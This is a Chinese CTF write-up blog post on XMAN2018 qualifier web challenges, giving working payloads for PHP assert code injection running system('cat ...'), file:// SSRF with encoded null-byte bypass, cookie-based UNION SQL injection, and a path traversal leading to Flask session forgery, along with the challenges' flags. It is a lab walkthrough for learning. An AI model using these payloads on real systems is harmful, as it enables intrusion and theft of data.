<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="XMAN2018 排位赛wp"><meta name="keywords" content=""><meta name="author" content="V0WKeep3r,v0wldl@163.com"><meta name="copyright" content="V0WKeep3r"><title>XMAN2018 排位赛wp | V0W's Blog</title><link rel="shortcut icon" href="/favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.2.0'
} </script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="V0W's Blog" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#XMAN2018-%E6%8E%92%E4%BD%8D%E8%B5%9Bwp"><span class="toc-text">XMAN2018 排位赛wp</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#WEB"><span class="toc-text">WEB</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-Meizijiu-magic2"><span class="toc-text">0x01 Meizijiu_magic2</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-text">分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag"><span class="toc-text">flag</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9"><span class="toc-text">知识点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-text">总结</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MAKEIT"><span class="toc-text">MAKEIT</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E9%A2%98%E9%93%BE%E6%8E%A5"><span class="toc-text">原题链接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90-1"><span class="toc-text">分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag-1"><span class="toc-text">flag</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9-1"><span class="toc-text">知识点</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SIMPLE-SSRF"><span class="toc-text">SIMPLE SSRF</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E9%A2%98%E9%93%BE%E6%8E%A5-1"><span class="toc-text">原题链接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90-2"><span class="toc-text">分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag-2"><span class="toc-text">flag</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9-2"><span class="toc-text">知识点</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#BBSQLI"><span class="toc-text">BBSQLI</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E9%A2%98%E9%93%BE%E6%8E%A5-2"><span class="toc-text">原题链接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90-3"><span class="toc-text">分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag-3"><span class="toc-text">flag</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9-3"><span class="toc-text">知识点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B3%A8%E6%84%8F%E7%82%B9"><span class="toc-text">注意点</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSHOP"><span class="toc-text">SSHOP</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E6%8F%8F%E8%BF%B0"><span class="toc-text">题目描述:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="toc-text">解题思路:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93-1"><span class="toc-text">总结</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-text">参考链接</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/Kaneki.jpg"></div><div class="author-info__name text-center">V0WKeep3r</div><div class="author-info__description text-center">Stay Hungry, Stay Foolish.</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/qingchenldl">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">53</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">35</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">11</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">友链</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://zhuxianjin.github.io/">J0k3r</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://p0desta.com/">p0desta</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://daolgts.github.io/">dlgts</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://iwenhu.cn/">mengchen</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://p0sec.net/">p0</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://asa9ao.xyz/">唯湖</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://seaii-blog.com/">seaii</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://wzt.ac.cn/">WCatalpa.T</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://syf.ac.cn/">7N1ght</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://www.nicefish.top/posts/">nicefish</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://flag0.com/">GetFlag</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://is4b3lla3.github.io">lsabellae</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/index.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">V0W's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">文章</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/categories">分类</a><a class="site-page" href="/about">关于我</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">XMAN2018 排位赛wp</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2018-08-11</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/CTF/">CTF</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">2.3k</span><span class="post-meta__separator">|</span><span>阅读时长: 10 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="XMAN2018-排位赛wp"><a href="#XMAN2018-排位赛wp" class="headerlink" title="XMAN2018 排位赛wp"></a>XMAN2018 排位赛wp</h1><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>感觉到了Web狗在CTF比赛中存活的艰难</p>
<p>其实笔者并没有参加XMAN集训营，但是从朋友那弄到8.10XMAN排位赛的一点题目，质量很不错，解了一两个web题目，misc解了三四个吧，反正很菜很菜。。。</p>
<p>但是确实学习到一些东西，又去网上找了wp详细看了，总结一下。</p>
<h1 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h1><h2 id="0x01-Meizijiu-magic2"><a href="#0x01-Meizijiu-magic2" class="headerlink" title="0x01 Meizijiu_magic2"></a>0x01 Meizijiu_magic2</h2><blockquote>
<p>文件上传到云<br>链接：<a target="_blank" rel="noopener" href="https://pan.baidu.com/s/1c2xBggREtl2XvCQEGlZocw">https://pan.baidu.com/s/1c2xBggREtl2XvCQEGlZocw</a> 密码：6qzz</p>
</blockquote>
<h3 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h3><p>看到<code>hint token_get_all()</code><br>打开下载的txt文件</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&#x2F;Applications&#x2F;MAMP&#x2F;htdocs&#x2F;CTF&#x2F;XMAN&#x2F;code.php:3:</span><br><span class="line">array (size&#x3D;232)</span><br><span class="line">  0 &#x3D;&gt; </span><br><span class="line">    array (size&#x3D;3)</span><br><span class="line">      0 &#x3D;&gt; int 376</span><br><span class="line">      2 &#x3D;&gt; int 1</span><br><span class="line">  1 &#x3D;&gt; </span><br><span class="line">    array (size&#x3D;3)</span><br><span class="line">      0 &#x3D;&gt; int 312</span><br><span class="line">      1 &#x3D;&gt; string &#39;&#39; (length&#x3D;2)</span><br><span class="line">      2 &#x3D;&gt; int 2</span><br><span class="line">  2 &#x3D;&gt; </span><br><span class="line">    array (size&#x3D;3)</span><br><span class="line">      0 &#x3D;&gt; int 379</span><br><span class="line">      2 &#x3D;&gt; int 2</span><br><span class="line">  3 &#x3D;&gt; string &#39;&#x3D;&#39; (length&#x3D;1)</span><br><span class="line">  4 &#x3D;&gt; </span><br><span class="line">    array (size&#x3D;3)</span><br><span class="line">      1 &#x3D;&gt; string &#39; &#39; (length&#x3D;1)</span><br><span class="line">      2 &#x3D;&gt; int 2</span><br><span class="line">..............</span><br></pre></td></tr></table></figure>
<p>题目使用了<a target="_blank" rel="noopener" href="http://php.net/manual/en/function.token-get-all.php">token_get_all</a>的解析器，将代码转换成上面的样子</p>
<p>这里手动解析挨行转换，将空格和其他空白符用*号代替</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">**=*******;</span><br><span class="line">*****=*base64_decode(******);</span><br><span class="line">****=*;</span><br><span class="line">$dd****=*<span class="number">85</span>;</span><br><span class="line">$____*=**********;</span><br><span class="line">*******=*<span class="string">&quot;In&quot;</span>.***.<span class="string">&quot;P&quot;</span>.<span class="string">&quot;h&quot;</span>.***;</span><br><span class="line">($i=<span class="number">0</span>;$i&lt;<span class="number">10</span>;$i++)&#123;</span><br><span class="line">	$dd=*=*$dd*+*<span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line">*********=*chr($dd);</span><br><span class="line">$dc*=*$dd;</span><br><span class="line">&#123;</span><br><span class="line">	$dd*=*$dc*+*$dc;</span><br><span class="line">	$dc;</span><br><span class="line">	($dc&lt;<span class="number">100</span>)</span><br><span class="line">	$_GET[<span class="string">&#x27;secret&#x27;</span>]*=*<span class="keyword">isset</span>($_GET[<span class="string">&#x27;secret&#x27;</span>])?$_GET[<span class="string">&#x27;secret&#x27;</span>]:<span class="number">1</span>;</span><br><span class="line">	($_GET[<span class="string">&#x27;secret&#x27;</span>]&#123;</span><br><span class="line">	*<span class="number">1</span>:</span><br><span class="line">	<span class="keyword">echo</span>*<span class="string">&quot;XMAN2018!&quot;</span>;</span><br><span class="line">	;</span><br><span class="line">	*<span class="number">4</span>:</span><br><span class="line">	;</span><br><span class="line">	*$dd:$f1*=***.&#123;.<span class="string">&quot;***&quot;</span>.********.****.********.str_rot13(*****).******.******;</span><br><span class="line">	<span class="keyword">echo</span>*$f1;</span><br><span class="line">	<span class="keyword">break</span>;</span><br><span class="line">	:</span><br><span class="line">	*<span class="string">&quot;XMAN NB!&quot;</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line"></span><br><span class="line">	&#125;)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>虽然看不了完整逻辑，但是大概的逻辑还是能看的出来的。<br><code>secret</code>接受一个参数，然后接受一个数，由于<code>$dc&lt;100</code>可以判断最终数字应该不大，于是可以爆破，<br><code>secret=198</code><br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180816/kHbI4C7Aj6.png?imageslim" alt="mark"></p>
<p>最后贴上题目源码（无马赛克:-)</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$_   &#x3D; &quot;FLAG&quot;;</span><br><span class="line">$__  &#x3D; base64_decode(&quot;QVNU&quot;);</span><br><span class="line">$___ &#x3D; &quot;TOKEN&quot;;</span><br><span class="line">$dd    &#x3D; &quot;85&quot;;</span><br><span class="line">$____ &#x3D; &quot;Erirefr&quot;;</span><br><span class="line">$_____ &#x3D; &quot;In&quot;.&quot;-&quot;.&quot;P&quot;.&quot;h&quot;.&quot;p&quot;;</span><br><span class="line">for($i&#x3D;0;$i&lt;10;$i++)&#123;</span><br><span class="line">    $dd &#x3D; $dd + 1;</span><br><span class="line">&#125;</span><br><span class="line">$_______ &#x3D; chr($dd);</span><br><span class="line">$dc &#x3D; $dd;</span><br><span class="line">do&#123;</span><br><span class="line">    $dd &#x3D; $dc + $dc;</span><br><span class="line">    $dc++;</span><br><span class="line">&#125;while($dc&lt;100);</span><br><span class="line">$_GET[&#39;secret&#39;] &#x3D; isset($_GET[&#39;secret&#39;])?$_GET[&#39;secret&#39;]:1;</span><br><span class="line">switch($_GET[&#39;secret&#39;])&#123;</span><br><span class="line">    case 1:</span><br><span class="line">        echo &quot;XMAN2018!&quot;;</span><br><span class="line">        break;</span><br><span class="line">    case 4:</span><br><span class="line">        break;</span><br><span class="line">    case $dd:</span><br><span class="line">        $fl &#x3D; $_.&quot;&#123;&quot;.&quot;$__&quot;.$_______.$___.$_______.str_rot13($____).$_____.&quot;!@#&#125;&quot;;</span><br><span class="line">        echo $fl;</span><br><span class="line">        break;</span><br><span class="line">    default:</span><br><span class="line">        echo &quot;XMAN NB!&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="flag"><a href="#flag" class="headerlink" title="flag"></a>flag</h3><h3 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h3><p>php简单审计，php-token_get_all</p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>其实这道题一点都不难，只要能把代码还原出来，大概能读懂代码逻辑，问题就迎刃而解，但是由于没有好的办法，php也没有还原函数，还原过程有点费劲。</p>
<h2 id="MAKEIT"><a href="#MAKEIT" class="headerlink" title="MAKEIT"></a>MAKEIT</h2><h3 id="原题链接"><a href="#原题链接" class="headerlink" title="原题链接"></a>原题链接</h3><p><a target="_blank" rel="noopener" href="http://202.112.51.184:15080/">http://202.112.51.184:15080/</a></p>
<h3 id="分析-1"><a href="#分析-1" class="headerlink" title="分析"></a>分析</h3><p>有Git源码泄露，Githack得到源码，在index.php中</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">if (isset($_GET[&#39;page&#39;])) &#123;</span><br><span class="line">	$page &#x3D; $_GET[&#39;page&#39;];</span><br><span class="line">&#125; else &#123;</span><br><span class="line">	$page &#x3D; &quot;home&quot;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$file &#x3D; &quot;templates&#x2F;&quot; . $page . &quot;.php&quot;;</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; I heard &#39;..&#39; is dangerous!</span><br><span class="line">assert(&quot;strpos(&#39;$file&#39;, &#39;..&#39;) &#x3D;&#x3D;&#x3D; false&quot;) or die(&quot;Detected hacking attempt!&quot;);</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; TODO: Make this look nice</span><br><span class="line">assert(&quot;file_exists(&#39;$file&#39;)&quot;) or die(&quot;That file doesn&#39;t exist!&quot;);</span><br><span class="line"></span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<ul>
<li>传入page参数，file可控，可以构造payload使assert函数闭合，然后RCE</li>
<li>构造payload<code>?page=&#39;, &#39;..&#39;) === false and system(&quot;cat templates/flag.php&quot;);//</code></li>
<li>payload<code>&#39; and die(show_source(&quot;templates/flag.php&quot;)) or &#39;</code></li>
<li>PHP语句就变成了<code>assert(&quot;strpos(&#39;$file&#39;, &#39;..&#39;) === false&quot;) and system(&quot;cat templates/flag.php&quot;);//</code></li>
<li>查看页面源代码得到flag<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;?php $FLAG&#x3D;&quot;XMAN&#123;flag_is_so_cool&#125;&quot;; ?&gt;</span><br><span class="line">That file doesn&#39;t exist!</span><br></pre></td></tr></table></figure>
<h3 id="flag-1"><a href="#flag-1" class="headerlink" title="flag"></a>flag</h3>XMAN{flag_is_so_cool}</li>
</ul>
<h3 id="知识点-1"><a href="#知识点-1" class="headerlink" title="知识点"></a>知识点</h3><p>.git源码泄露，远程命令执行</p>
<h2 id="SIMPLE-SSRF"><a href="#SIMPLE-SSRF" class="headerlink" title="SIMPLE SSRF"></a>SIMPLE SSRF</h2><h3 id="原题链接-1"><a href="#原题链接-1" class="headerlink" title="原题链接"></a>原题链接</h3><p><a target="_blank" rel="noopener" href="http://202.112.51.184:11080/">http://202.112.51.184:11080</a></p>
<p>题目hint:</p>
<pre><code>1. flag格式：XMAN&#123;.*&#125;
2. hint:curl
3. hint:flag在/etc/flag.txt</code></pre>
<h3 id="分析-2"><a href="#分析-2" class="headerlink" title="分析"></a>分析</h3><p>首先尝试更换url为<code>https://sina.cn</code><br>返回<code>wrong site</code>，判断是对url做了检测<br>采用<code>file</code>协议进行读取<code>flag.txt</code>文件</p>
<p><a target="_blank" rel="noopener" href="http://202.112.51.184:11080/?site=file://www.baidu.com/etc/flag.txt">http://202.112.51.184:11080/?site=file://www.baidu.com/etc/flag.txt</a></p>
<blockquote>
<p>get source failed.</p>
</blockquote>
<p>尝试%00截断<br><a target="_blank" rel="noopener" href="http://202.112.51.184:11080/?site=file://www.baidu.com/etc/flag.txt%00">http://202.112.51.184:11080/?site=file://www.baidu.com/etc/flag.txt%00</a></p>
<blockquote>
<p>还是 get source failed.</p>
</blockquote>
<p>怀疑是把特殊字符过滤了<br>url转码后，得到flag</p>
<p><a target="_blank" rel="noopener" href="http://202.112.51.184:11080/?site=file://www.baidu.com/etc/flag.txt%2500">http://202.112.51.184:11080/?site=file://www.baidu.com/etc/flag.txt%2500</a></p>
<blockquote>
<p>XMAN{f1l3_pr0toc0l_1s_us3ful}</p>
</blockquote>
<h3 id="flag-2"><a href="#flag-2" class="headerlink" title="flag"></a>flag</h3><p>XMAN{f1l3_pr0toc0l_1s_us3ful}</p>
<h3 id="知识点-2"><a href="#知识点-2" class="headerlink" title="知识点"></a>知识点</h3><p>SSRF,file协议，简单bypass</p>
<h2 id="BBSQLI"><a href="#BBSQLI" class="headerlink" title="BBSQLI"></a>BBSQLI</h2><h3 id="原题链接-2"><a href="#原题链接-2" class="headerlink" title="原题链接"></a>原题链接</h3><p><a target="_blank" rel="noopener" href="http://202.112.51.184:16080/">http://202.112.51.184:16080/</a></p>
<h3 id="分析-3"><a href="#分析-3" class="headerlink" title="分析"></a>分析</h3><p>POST GET均无效，尝试cookie注入，发现</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Cookie:PHPSESSID&#x3D;1&#39; and 1&#x3D;1 --+</span><br><span class="line">结果：</span><br><span class="line">Your secrets</span><br><span class="line">123</span><br><span class="line">sss</span><br><span class="line">-----</span><br><span class="line">Cookie:PHPSESSID&#x3D;1&#39; and 1&#x3D;2 --+</span><br><span class="line">结果</span><br><span class="line">You don&#39;t have any secrets yet.</span><br></pre></td></tr></table></figure>
<p>说明存在SQL注入漏洞，接下来简单的<code>union</code>联合查询也就可以得到结果了。也可以布尔盲注，错误的话，显示信息都是<code>You don&#39;t have any secrets yet.</code><br>下面测试<code>union</code>联合查询：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"># 测试发现只有2列</span><br><span class="line">Cookie: PHPSESSID&#x3D;1&#39; group by 2--+;</span><br><span class="line"></span><br><span class="line"># 确定可用列</span><br><span class="line">Cookie: PHPSESSID&#x3D;1&#39; union select 1,2--+;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>返回2，2可用</p>
</blockquote>
<p><strong>查表名</strong></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Cookie: PHPSESSID&#x3D;1&#39; union select 1,table_name from information_schema.tables where table_schema&#x3D;database() --+</span><br><span class="line"></span><br><span class="line">表名：</span><br><span class="line">[GDJM_flag]</span><br><span class="line">secrets</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180817/IECk4icfE9.png?imageslim" alt="mark"></p>
<p><strong>查列名</strong></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Cookie: PHPSESSID&#x3D;1&#39; union select 1,column_name from information_schema.columns where table_schema&#x3D;database() --+;</span><br><span class="line"></span><br><span class="line">列名</span><br><span class="line">flag</span><br><span class="line">session_id</span><br><span class="line">secret</span><br></pre></td></tr></table></figure>
<p><strong>GetFlag</strong></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Cookie: PHPSESSID&#x3D;1&#39; union select 1,flag from &#96;[GDJM_flag]&#96;--+;</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180817/2I3G5lGfg4.png?imageslim" alt="mark"></p>
<h3 id="flag-3"><a href="#flag-3" class="headerlink" title="flag"></a>flag</h3><p>xman{YoVr_4R3_a_Bada5s_Ge7_My_Fl4g}</p>
<h3 id="知识点-3"><a href="#知识点-3" class="headerlink" title="知识点"></a>知识点</h3><p>Cooike 注入</p>
<h3 id="注意点"><a href="#注意点" class="headerlink" title="注意点"></a>注意点</h3><p>这里有一点点坑，就是涉及到<code>[]</code>命名的表名，列名都需要加`反引号，否则报错。</p>
<p>看了sql文件：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">DROP DATABASE IF EXISTS &#96;sqli&#96;;</span><br><span class="line"></span><br><span class="line">CREATE DATABASE &#96;sqli&#96;;</span><br><span class="line"></span><br><span class="line">USE &#96;sqli&#96;;</span><br><span class="line"></span><br><span class="line">DROP TABLE IF EXISTS &#96;secrets&#96;;</span><br><span class="line"></span><br><span class="line">CREATE TABLE &#96;secrets&#96; (</span><br><span class="line">  &#96;session_id&#96; varchar(50) DEFAULT NULL,</span><br><span class="line">  &#96;secret&#96; varchar(200) DEFAULT NULL</span><br><span class="line">) ENGINE&#x3D;InnoDB DEFAULT CHARSET&#x3D;latin1;</span><br><span class="line"></span><br><span class="line">DROP TABLE IF EXISTS &#96;[GDJM_flag]&#96;;</span><br><span class="line">CREATE TABLE &#96;[GDJM_flag]&#96;(</span><br><span class="line">	&#96;flag&#96; varchar(50) DEFAULT NULL</span><br><span class="line">) ENGINE&#x3D;InnoDB DEFAULT CHARSET&#x3D;latin1;</span><br><span class="line"></span><br><span class="line">LOCK TABLES &#96;[GDJM_flag]&#96; WRITE;</span><br><span class="line"></span><br><span class="line">INSERT INTO &#96;[GDJM_flag]&#96; VALUES (&#39;xman&#123;YoVr_4R3_a_Bada5s_Ge7_My_Fl4g&#125;&#39;);</span><br><span class="line"></span><br><span class="line">UNLOCK TABLES;</span><br><span class="line">flush privileges;</span><br><span class="line">CREATE USER &#39;sqli&#39;@&#39;%&#39; IDENTIFIED BY &#39;sqli&#39;;</span><br><span class="line">grant all ON *.*  to &#39;sqli&#39;@&#39;%&#39;;</span><br><span class="line">flush privileges;</span><br></pre></td></tr></table></figure>
<p>发现其中涉及库名，表名，字段名的都是用反引号的，后来在sql命令行中尝试过不用反引号的带有[]的表名报错，并且用mysql命令行查询时，不加反引号报错，所以判定，当在mysql中反引号并不只是把保留关键字当用户名，并且遇到带中文和[]的命名时，也需要用反引号，所以在sql注入中看到中括号就考虑反引号就可以。<br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180817/Ajii7IKbEe.png?imageslim" alt="mark"></p>
<h2 id="SSHOP"><a href="#SSHOP" class="headerlink" title="SSHOP"></a>SSHOP</h2><h3 id="题目描述"><a href="#题目描述" class="headerlink" title="题目描述:"></a>题目描述:</h3><pre><code>http://202.112.51.184:13080/
flag格式：
flag&#123;.*&#125;</code></pre>
<h3 id="解题思路"><a href="#解题思路" class="headerlink" title="解题思路:"></a>解题思路:</h3><p>打开题目后发现能直接把源码下下来审计, 发现只要<code>session[&#39;admin&#39;]==True</code>就能获得 flag.<br>首先看一下判断部分的代码:</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"># 用户信息</span><br><span class="line">@users.route(&#39;&#x2F;&#39;)</span><br><span class="line">def user():</span><br><span class="line">    if not login_status_check():</span><br><span class="line">        return redirect(url_for(&#39;users.login&#39;))</span><br><span class="line">    flag &#x3D; open(&#39;.&#x2F;flag&#39;).read() if is_admin() else False</span><br><span class="line">    return render_template(&#39;user.html&#39;, user&#x3D;user, flag&#x3D;flag, current_user&#x3D;1)</span><br><span class="line"></span><br><span class="line">def is_admin():</span><br><span class="line">    if login_status_check():</span><br><span class="line">        return session[&#39;admin&#39;]</span><br><span class="line">    else:</span><br><span class="line">        return False</span><br><span class="line"></span><br><span class="line">def login_status_check():</span><br><span class="line">    return bool(session.get(&#39;id&#39;, False))</span><br></pre></td></tr></table></figure>
<p>这里的逻辑就是先判断 session 中是否有 ID(是否登陆), 如果有的话就返回 session[‘admin] 的值, 那么再看一下这个session[‘admin’]是怎么来的.</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">@users.route(&#39;&#x2F;login&#39;, methods&#x3D;[&#39;POST&#39;, &#39;GET&#39;])</span><br><span class="line">def login():</span><br><span class="line">    Login_error &#x3D; False</span><br><span class="line">    if request.method  &#x3D;&#x3D; &#39;POST&#39;:</span><br><span class="line">        user &#x3D; User.query.filter_by(username&#x3D;request.form.get(&#39;username&#39;)).first()</span><br><span class="line">        if not user or user.password !&#x3D; request.form.get(&#39;password&#39;):</span><br><span class="line">            Login_error &#x3D; u&#39;用户名或密码错误&#39;</span><br><span class="line">            return render_template(&quot;login.html&quot;, Login_error&#x3D;Login_error)</span><br><span class="line">        else:</span><br><span class="line">            session[&#39;id&#39;] &#x3D; user.id</span><br><span class="line">            session[&#39;username&#39;] &#x3D; user.username</span><br><span class="line">            session[&#39;admin&#39;] &#x3D; False</span><br><span class="line">            return redirect(url_for(&#39;users.user&#39;))</span><br><span class="line">    return render_template(&quot;login.html&quot;)</span><br></pre></td></tr></table></figure>
<p>可以看到这里只要登陆成功后便会把 <code>session[&#39;admin&#39;]</code> 设置为 <code>False</code>, 一开始在这个地方卡了好久, 不知道修改 <code>session[&#39;admin&#39;]</code>, 后来在查文章的时候发现 ph 师傅博客提到了<code>flask session</code>机制. 详情<br>博客里面提到flask中使用的session是客户端session, 通常session是储存在服务端里面的, 用户能看到的只是session的名称, 并不能看到他的值, 而flask使用的是客户端session, 是直接把值储存在用户的 cookie 中的, 所以这就导致了用户可以篡改 session. 看一下本题的 secret_key</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">with open(&#39;.secret_key&#39;, &#39;a+b&#39;) as secret:</span><br><span class="line">    secret.seek(0)</span><br><span class="line">    key &#x3D; secret.read()</span><br><span class="line">    if not key:</span><br><span class="line">        key &#x3D; randstr(32)</span><br><span class="line">        secret.write(key)</span><br><span class="line">        secret.flush()</span><br></pre></td></tr></table></figure>
<p>他使用的 flask 默认的加密方法, 并且不是随机生成的 key, 而是读取外部的 key. 所以我们只要获取了 key 就可以伪造 session 了. 审了好久发现了一个目录穿越漏洞.</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">@users.route(&#39;&#x2F;asserts&#x2F;&lt;path:path&gt;&#39;)</span><br><span class="line">def static_handler(path):</span><br><span class="line">    filename &#x3D; os.path.join(app.root_path,&#39;asserts&#39;,path)</span><br><span class="line">    if os.path.isfile(filename):</span><br><span class="line">        return send_file(filename)</span><br><span class="line">    else:</span><br><span class="line">        abort(404)</span><br></pre></td></tr></table></figure>
